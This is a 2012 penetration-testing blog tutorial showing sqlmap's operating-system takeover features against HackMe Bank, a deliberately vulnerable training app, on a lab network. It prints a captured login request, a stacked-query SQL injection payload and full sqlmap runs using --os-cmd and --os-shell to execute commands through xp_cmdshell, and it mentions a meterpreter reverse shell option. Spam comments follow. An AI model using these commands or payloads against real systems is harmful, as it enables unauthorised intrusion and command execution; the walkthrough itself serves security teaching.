Thursday, 24 May 2012

SQLMap - Operating System Takeover - Windows

Today I'm trying to use "OS takeover" feature of sqlmap. sqlmap can be used to get command shell using sql injection. sqlmap provides following options for OS level access:

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

sqlmap uses various methods to achieve operating system access based on database type. Please read sqlmap documentation for more information.

The target I used for this is HackMe Bank from FoundStone installed on Windows XP machine (IP:192.168.1.4). HackMe Bank is a vulnerable application written in ASP.Net with MSSQL as backend database. The attacker machine is BackTrack5 (IP:192.168.1.3). Let's browse the target site.






Let's test basic SQL Injection by injecting single quote (') in username field of login page.


And the result is


"Username" field seems to be vulnerable to sql injection. Let's capture the Login request and feed it to sqlmap for further analysis. We can use -r option of sqlmap to provide POST request. The POST request looks like this:

POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.1.4/HacmeBank_v2_Website/aspx/login.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 210

__VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGQX7Zm1%2Fne8qfz4FyjBx4QNynpGLw%3D%3D&txtUserName=asd&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=%2FwEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g%2BMJe%2Fifr7tT



Let's run sqlmap. I used --dbms=MSSQL and --technique=S (Stack Queries technique) to save time as I already know these details.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:50:36

[14:50:36] [INFO] parsing HTTP request from 'hackme.txt'
[14:50:36] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[14:50:36] [INFO] testing connection to the target url
[14:50:37] [INFO] heuristics detected web page charset 'ascii'
[14:50:38] [WARNING] reflective value(s) found and filtering out
[14:50:38] [WARNING] heuristic test shows that POST parameter 'txtUserName' might not be injectable
[14:50:38] [INFO] testing sql injection on POST parameter 'txtUserName'
[14:50:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:50:38] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[14:51:00] [INFO] POST parameter 'txtUserName' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[14:51:00] [INFO] checking if the injection point on POST parameter 'txtUserName' is a false positive
POST parameter 'txtUserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[14:51:15] [INFO] testing Microsoft SQL Server
[14:51:15] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[14:51:20] [INFO] confirming Microsoft SQL Server
[14:51:30] [INFO] adjusting time delay to 2 seconds due to good response times
[14:51:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[14:51:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 14:51:30

root@bt:/pentest/database/sqlmap#

sqlmap has detected the injection and presented us the OS details and operating system details. You can go ahead and dig more details about databases, tables, columns, users, etc.

1. Option: --os-cmd=OSCMD

sqlmap executes a system command and will display the output. sqlmap will use "xp_cmdshell" for OS system access. I'll demonstrate "hostname" command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-cmd=hostname

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:32:07

[16:32:07] [INFO] parsing HTTP request from 'hackme.txt'
[16:32:07] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[16:32:07] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:32:07] [INFO] testing connection to the target url
[16:32:09] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[16:32:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[16:32:09] [INFO] testing if current user is DBA
[16:32:09] [INFO] resumed: 1
[16:32:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[16:32:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:32:19] [INFO] testing if xp_cmdshell extended procedure is usable
[16:32:46] [INFO] adjusting time delay to 2 seconds due to good response times
[16:33:19] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] Y
[16:33:24] [INFO] retrieved: XP_FDCC 
command standard output:    'XP_FDCC'

[16:34:24] [INFO] cleaning up the database management system
[16:34:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 16:34:24

root@bt:/pentest/database/sqlmap#



2. Option: --os-shell

sqlmap provides you a shell where you can run many commands.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-shell

    sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:34:33

[16:34:33] [INFO] parsing HTTP request from 'hackme.txt'
[16:34:33] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file
[16:34:33] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:34:33] [INFO] testing connection to the target url
[16:34:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT
---

[16:34:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[16:34:34] [INFO] testing if current user is DBA
[16:34:34] [INFO] resumed: 1
[16:34:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..    
[16:34:44] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:34:44] [INFO] testing if xp_cmdshell extended procedure is usable
[16:35:11] [INFO] adjusting time delay to 2 seconds due to good response times
[16:35:50] [ERROR] invalid character detected. retrying..
[16:35:50] [WARNING] increasing time delay to 3 seconds
[16:36:10] [INFO] xp_cmdshell extended procedure is usable
[16:36:10] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[16:36:10] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> hostname
do you want to retrieve the command standard output? [Y/n/a] Y
[16:40:35] [INFO] retrieved: XP_FDCC 
command standard output:    'XP_FDCC'

os-shell> q
[16:43:00] [INFO] cleaning up the database management system
[16:43:00] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'

[*] shutting down at 16:43:00

root@bt:/pentest/database/sqlmap#


3. Option: --os-pwn

sqlmap provides various options to connect to database server like Metasploit meterpreter, out-of-band shell and VNC. Again read sqlmap documentation for more information. Following video demonstrates the meterpreter reverse shell technique:


This concludes the operating system takeover with sqlmap. In next blogpost, I'll try to takeover a linux host.

Hope you like this. Let me know your views, comments, suggestions, etc.

20 comments:

  1. Wonderful... nicely demonstrated.

    Thanks
    R@J

    ReplyDelete
  2. Nice one amol. Like it :)

    BTW, can you increase the font size of the monospaced ones? They are too tiny to read :|

    ReplyDelete
  3. Thanks @raj0009.
    Nice catch @Vaibhav, will keep in mind to increase the font size for video.

    ReplyDelete
  4. Your site is very informative and your articles are wonderful.
    recover deleted files on mac

    ReplyDelete
  5. You posting are wonderful and informative.
    get a job now

    ReplyDelete
  6. You guys out there are performing a great job.
    Dallas Mold Inspection

    ReplyDelete
  7. This would work for any OS right?
    Like for ex in linux we can give,
    --os-cmd=whoami
    ?
    Or does sqlmap only supports Windows XP exploit ?

    ReplyDelete
  8. I am happy to find so many useful information here in the post, thanks for sharing it here. I hope you will adding more.
    Responsive Web Design Firms in india

    ReplyDelete
  9. I knew this blog post was existed someplace. Thanks to post such articles. Will unquestionably be using it very soon.infographic design

    ReplyDelete
  10. Your articles make whole sense of every topic.infographic

    ReplyDelete
  11. Thankfulness to my dad who informed me relating to this blog, this website is really amazing.cheap auto insurance

    ReplyDelete
  12. I love this blog because it is user friendly with appreciative information.
    automobile

    ReplyDelete
  13. I was pinning away for such type of blogs, thanks for posting this for us.
    weight loss pills that work

    ReplyDelete
  14. I’m impressed with the special and informative contents that you just offer in such short timing.
    click here

    ReplyDelete
  15. You entirely go with our expectation and the range of our information.
    replica watches

    ReplyDelete
  16. This blog site has really a huge collection of articles with impressive information.
    Buy Follistatin

    ReplyDelete
  17. I have been really impressed by going through this awesome blog.
    excess baggage shipping

    ReplyDelete
  18. Great webpage buddy, I am going to notify this to all my friends and contacts as well.

    central booking new york

    ReplyDelete
  19. Your contents provide me a lot of creative suggestions that I can seemingly utilize on my web page too.

    vlc streaming server

    ReplyDelete
  20. I will prefer this blog because it has much more informative stuff.

    best free ftp client

    ReplyDelete